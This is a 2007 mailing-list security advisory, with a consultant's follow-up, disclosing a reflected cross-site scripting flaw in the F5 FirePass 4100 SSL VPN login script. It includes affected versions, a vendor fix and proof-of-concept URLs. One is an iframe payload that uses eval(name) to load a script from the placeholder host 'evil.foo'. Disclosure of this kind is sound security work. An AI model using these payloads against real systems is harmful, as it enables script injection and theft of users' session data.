On Fri, Nov 30, 2007 at 12:50 PM, <research (at) procheckup (dot) com [email concealed]> wrote:
PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script
Date Found: 19th June 2007
Successfully tested on: version 5.5.2
F5 Networks has confirmed the following versions to be vulnerable:
FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1
Description:
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.
No authentication is required to exploit this vulnerability.
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.
To exploit this in both firefox and IE requires an extra char ("=") in the end.
Using the same PoC URL we get:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_tes
t</textarea><!--=
Client environment:
firefox 2.0.0.11 and IE 6.0.2900.2180
Ricardo Martins, CISA
Security Consultant
Mobile. +351 933 478 679
Chief Security Officers, S.A.
Ed. Infante D. Henrique
Rua João Chagas, 53 - 1º esq.
Cruz Quebrada
1495-764 Dafundo Portugal
Tel. +351 210 111 616 :: Fax. +351 210 111 618 :: email. info (at) cso (dot) pt [email concealed] :: web. http://www.cso.pt
__________________________________________________________________
On Fri, Nov 30, 2007 at 12:50 PM, <research (at) procheckup (dot) com [email concealed]> wrote:
PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script
Date Found: 19th June 2007
Successfully tested on: version 5.5.2
F5 Networks has confirmed the following versions to be vulnerable:
FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1
Description:
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.
No authentication is required to exploit this vulnerability.
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.
Proof of concept (PoC) URL:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_tes
t</textarea><!--
The payload in the example is
"></script><textarea>HTML_injection_test</textarea><!--
which injects a 'textarea' box
The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b' in this case):
<html>
<iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeva
l%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xs
s.setAttribute('src','http://www.evil.foo/b')"></iframe>
</html>
Successfully tested on:
Server environment:
F5 FirePass 4100
Client environment:
Microsoft Internet Explorer 7.0.5730.11
Severity: Medium/High
Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com)
With thanks to Petko D. Petkov for suggesting the eval(name) technique.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.f5.com/products/FirePass/
ProCheckUp thanks F5 Networks for working with us.
Fix:
F5 Networks has issued SOL7923:
https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?s
r=1
[ reply ]